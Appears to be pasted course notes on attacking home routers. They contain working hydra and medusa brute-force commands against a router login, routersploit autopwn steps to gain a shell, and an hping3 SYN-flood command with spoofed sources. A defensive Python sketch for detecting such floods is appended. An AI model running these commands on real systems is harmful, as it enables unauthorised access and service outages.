LuciferAviSonicX

Grade 2 Session 2 only

Oct 4th, 2017
  1. Penetration Testing Of Routers
  2. -------------------------------
  3. Every router has its own login page. We need to provide a username and password to enter the router's interface.
  4. route -n ---> gateway address
  5. 192.168.0.1
  6. username
  7. password
  8. username ---> admin/Admin
  9. default ---> 50%
  10.  
  11. hydra
  12. medusa
  13. Both are brute-forcing tools which can be used to crack authentication forms. They attack logins on protocols such as ftp, ssh, telnet, http, https. Hydra is comparatively slow. Medusa is fast and provides various protocols to work with.
  14.  
  15.  
  16. hydra -s 80 -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-get
  17.  
  18.  
  19.  
  20. medusa -h 192.168.0.1 -U /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt -e ns -t 1 -v 5 -f -M http
  21.  
  22.  
  23.  
  24. routersploit --> a router exploitation framework, which uses already existing router exploits and runs them against the target.
  25.  
  26. https://github.com/reverse-shell/routersploit
  27. >./rsf.py
  28. >use scanners/autopwn
  29. >set target 192.168.0.1
  30. >run
  31. -------
  32. got an exploit
  33. -------
  34. >use exploit/<path>
  35. > show options
  36. > set target 192.168.0.1
  37. > run
  38. shell access
  39.  
  40.  
  41. DoS --> Denial of Service ---> A large amount of data or traffic is sent to the web server from one device only. It results in web services crashing, the server going down, and loss to the company.
  42. The defenders will monitor the IP address. If the traffic from that IP address is unnecessary and huge in amount compared to regular traffic, blacklist that IP address.
  43.  
  44. DDoS ---> Distributed Denial of Service ---> It is a distributed DoS attack. Here the traffic is sent from multiple IP addresses, but to a single web server.
  45.  
  46. hping3
  47. hping3 is a network tool able to send custom TCP/IP packets and to display
  48. target replies like ping program does with ICMP replies. hping3
  49. handle fragmentation, arbitrary packets body and size and can be used
  50. in order to transfer files encapsulated under supported protocols.
  51. Using hping3 you are able to perform at least the following stuff:
  52.  
  53. - Test firewall rules
  54. - Advanced port scanning
  55. - Test net performance using different protocols,
  56. packet size, TOS (type of service) and fragmentation.
  57. - Path MTU discovery
  58. - Transferring files between even really fascist firewall
  59. rules.
  60. - Traceroute-like under different protocols.
  61. - Firewalk-like usage.
  62. - Remote OS fingerprinting.
  63. - TCP/IP stack auditing.
  64. - A lot of others.
  65.  
  66.  
  67. It's also a good didactic tool to learn TCP/IP. hping3 is developed
  68. and maintained by antirez@invece.org and is licensed under GPL version
  69. 2. Development is open so you can send me patches, suggestion and
  70. affronts without inhibitions.
  71.  
  72.  
  73. hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source 172.16.79.141
  74.  
  75. -c ---> count ---> number of packets to be sent
  76. -d ---> size of each packet
  77. -p ---> port number
  78. --flood ---> do not stop ---> start flooding the service
  79. --rand-source ---> where the packet came from... report any arbitrary address as the source
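
Added example, not part of the original notes: the per-IP blacklisting described under DoS works when one address sends the traffic, but with --rand-source every packet reports a different source, so no single address stands out. The Python sketch below runs both checks over a constructed one-second packet summary; the tuple format, thresholds and addresses are assumptions made for illustration.

```python
from collections import Counter, defaultdict

def per_source_offenders(packets, max_syns):
    """Blacklist approach from the notes: sources sending more than max_syns SYNs."""
    syns = Counter(src for src, _port, flag in packets if flag == "S")
    return {src for src, n in syns.items() if n > max_syns}

def flooded_ports(packets, min_syns, min_completion):
    """Source-independent check: ports with many SYNs but few completed handshakes."""
    syn_count = Counter()
    syn_sources = defaultdict(set)
    ack_sources = defaultdict(set)
    for src, port, flag in packets:
        if flag == "S":
            syn_count[port] += 1
            syn_sources[port].add(src)
        elif flag == "A":
            ack_sources[port].add(src)
    flagged = {}
    for port, n in syn_count.items():
        # Fraction of SYN senders that went on to ACK (finished the handshake).
        completed = len(syn_sources[port] & ack_sources[port])
        ratio = completed / len(syn_sources[port])
        if n >= min_syns and ratio < min_completion:
            flagged[port] = round(ratio, 3)
    return flagged

def constructed_window(spoofed):
    """Constructed one-second window (not real traffic): 5 normal clients on
    port 80, plus 1000 SYNs to port 21 from one source or from spoofed ones."""
    pkts = []
    for i in range(5):
        client = f"10.0.0.{i + 1}"
        pkts += [(client, 80, "S"), (client, 80, "A")]
    for i in range(1000):
        src = f"198.18.{i // 250}.{i % 250 + 1}" if spoofed else "203.0.113.9"
        pkts.append((src, 21, "S"))
    return pkts

if __name__ == "__main__":
    for spoofed in (False, True):
        window = constructed_window(spoofed)
        print("spoofed" if spoofed else "single source",
              per_source_offenders(window, 100), flooded_ports(window, 500, 0.5))
```

With spoofed sources the per-IP check returns nothing to blacklist, while the handshake-completion check still flags port 21, which is why SYN-flood defences key on half-open connections (for example SYN cookies) rather than on source address alone.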